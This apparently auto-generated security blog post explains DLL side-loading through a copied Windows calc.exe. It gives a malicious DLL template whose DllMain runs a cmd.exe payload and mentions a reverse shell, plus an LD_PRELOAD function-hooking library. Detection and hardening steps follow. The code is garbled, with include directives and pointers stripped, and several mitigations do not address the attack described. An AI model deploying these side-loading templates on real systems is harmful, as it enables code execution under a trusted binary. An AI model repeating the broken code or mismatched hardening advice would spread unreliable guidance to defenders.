The Calculator Con: How Hackers Are Using calcexe to Hijack Your System

Listen to this Post

Featured Image

Introduction:

In a stark reminder that threats often hide in plain sight, cybersecurity researchers have unveiled a novel attack vector leveraging the ubiquitous Windows Calculator (calc.exe). This technique, involving DLL side-loading, allows malicious actors to execute arbitrary code under the guise of a trusted, signed Microsoft application, bypassing traditional security defenses and user suspicion.

Learning Objectives:

  • Understand the mechanism of DLL side-loading attacks through trusted executables.
  • Learn to detect malicious activity masquerading as legitimate Windows processes.
  • Implement hardening measures to mitigate the risk of living-off-the-land binary (LOLBin) attacks.

You Should Know:

  1. The Mechanics of the calc.exe DLL Side-Loading Hack
    The attack exploits the Windows DLL search order. When `calc.exe` is launched, it may attempt to load certain DLLs from its immediate directory before checking system locations. By placing a maliciously crafted DLL (e.g., windows.storage.dll) alongside a copy of the legitimate `calc.exe` in a controlled folder, attackers can trick the calculator into loading and executing their code with the same privileges as the parent process.

Step‑by‑step guide explaining what this does and how to use it.
Step 1: The attacker obtains a copy of the legitimate `calc.exe` (from a clean Windows system).
Step 2: They create a malicious DLL with a specific export that `calc.exe` requests (e.g., DllGetClassObject). This DLL contains the payload.

// Simplified Malicious DLL (windows.storage.dll) Pseudocode
include <windows.h>
include <stdlib.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
system("cmd.exe /c whoami > C:\temp\hack.txt"); // Example payload
// Alternatively, spawn a reverse shell or beacon
}
return TRUE;
}

STDAPI DllGetClassObject(REFCLSID rclsid, REFIID riid, LPVOID ppv) {
// Required export; can be a simple stub.
return CLASS_E_CLASSNOTAVAILABLE;
}

Step 3: The attacker places both files in a directory and executes calc.exe. The OS loads the malicious windows.storage.dll, triggering the payload.

2. Detection: Hunting for Malicious calc.exe Instances

Legitimate `calc.exe` runs from C:\Windows\System32\. Instances running from any other location are highly suspicious. Use endpoint detection (EDR) queries or simple command-line audits.

Step‑by‑step guide explaining what this does and how to use it.
Step 1: On a Windows system, use PowerShell to find running `calc.exe` processes and their paths:

Get-Process calc -ErrorAction SilentlyContinue | Select-Object Name, Path, Id

Step 2: Analyze any instance where the `Path` is not C:\Windows\System32\calc.exe. Investigate the parent process and directory contents.
Step 3: For proactive hunting, deploy a YARA rule to memory or disk to detect the known malicious DLL pattern.

rule Suspect_WindowsStorage_DLL {
meta:
description = "Detects potential malicious windows.storage.dll for side-loading"
author = "Your-SOC"
strings:
$calc_import = "calc.exe" wide
$suspect_export = "DllGetClassObject"
$shell_cmd = /cmd.exe.\/c/ wide
condition:
all of them and filesize < 500KB
}

3. Mitigation: Hardening Against DLL Side-Loading

Prevention focuses on controlling DLL search paths and applying robust security policies.

Step‑by‑step guide explaining what this does and how to use it.
Step 1: Enable Attack Surface Reduction (ASR) Rules. In Microsoft Defender, enable the rule “Block executable content from email client and webmail” and “Block all Office applications from creating child processes,” which can catch payload delivery.
Step 2: Implement Code Integrity Policies. Use Windows Defender Application Control (WDAC) to allow only trusted, signed applications from specified paths to run.

 Example to audit policies (Run as Admin)
$PolicyPath = "$env:USERPROFILE\Desktop\SiPolicy.xml"
New-CIPolicy -Level Publisher -FilePath $PolicyPath -Audit

Step 3: Set DLL Search Order Safeguards. Use Group Policy or registry keys to strengthen DLL loading: `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager` – modify `CWDIllegalInDllSearch` REG_DWORD to `0xFFFFFFFF` to prevent loading from the current working directory.

4. Linux Parallel: Shared Library Hijacking with ld.so

The core concept is not Windows-specific. Linux is vulnerable to similar shared library (.so) hijacking via the `LD_PRELOAD` or `LD_LIBRARY_PATH` environment variables.

Step‑by‑step guide explaining what this does and how to use it.
Step 1: A simple malicious library to intercept strcmp.

// mal_lib.c
define _GNU_SOURCE
include <stdio.h>
include <string.h>
include <dlfcn.h>

int strcmp(const char s1, const char s2) {
printf("[bash] Comparing '%s' with '%s'\n", s1, s2);
// Call the real strcmp
int (original_strcmp)(const char, const char);
original_strcmp = dlsym(RTLD_NEXT, "strcmp");
return original_strcmp(s1, s2);
}

Step 2: Compile and test the hijack.

gcc -shared -fPIC -o mal_lib.so mal_lib.c -ldl
LD_PRELOAD=./mal_lib.so ls  Any command that uses strcmp will now log

Step 3: Mitigation: Never run SUID binaries with `LD_` variables (modern systems ignore them), and use tools like `strace` or `ltrace` to monitor for unexpected library calls.

5. Broader Implications for API and Cloud Security

This attack underscores the “trust but verify” principle. In cloud environments, analogous risks exist with trusted service roles and functions. An attacker with initial access can abuse high-permission roles to launch further attacks from a “trusted” entity.

Step‑by‑step guide explaining what this does and how to use it.
Step 1: In AWS, regularly audit IAM roles attached to EC2 instances or Lambda functions using the CLI:

aws iam list-attached-role-policies --role-name MyAppInstanceRole

Step 2: Apply the principle of least privilege. Replace overly permissive policies (e.g., "Action": "") with specific actions and resources.
Step 3: Monitor CloudTrail logs for unusual `AssumeRole` or `InvokeFunction` events originating from unexpected regions or times, which could indicate a trusted component has been compromised.

What Undercode Say:

  • Trust is the Weakest Link. The most insidious attacks don’t breach walls; they walk through the front door by abusing inherent trust in signed applications and system processes. Security monitoring must evolve beyond process names to inspect behavior, lineage, and provenance.
  • The LOLBin Arms Race is Accelerating. The use of Living-Off-the-Land Binaries (LOLBins) like calc.exe, msbuild.exe, or `powershell.exe` is becoming the standard, not the exception. Defenders must curate and monitor an allow-list of normal behaviors for these tools within their specific environment, as blocking them entirely is often impractical.

This calc.exe hack is not an isolated vulnerability but a symptom of a pervasive threat model. It represents the sophisticated abuse of intended functionality, making it a potent technique for both initial access and persistence. As EDR solutions get better at spotting obfuscated scripts and binary malware, attackers will increasingly invest in these “clean” techniques that leave a minimal forensic footprint.

Prediction:

The future of endpoint attacks will be dominated by “identity-centric” execution, where malicious activity is indistinguishable from legitimate user and system behavior. We will see a rise in malware that exclusively uses signed binaries and legitimate cloud APIs, forcing a paradigm shift in detection towards continuous authentication validation, behavior baselining, and AI-driven anomaly detection that analyzes the intent behind a sequence of actions, not just the actions themselves. The line between compromise and normal operation will blur, demanding defense-in-depth that spans identity, endpoint, and cloud workload security.

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Larisa M – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky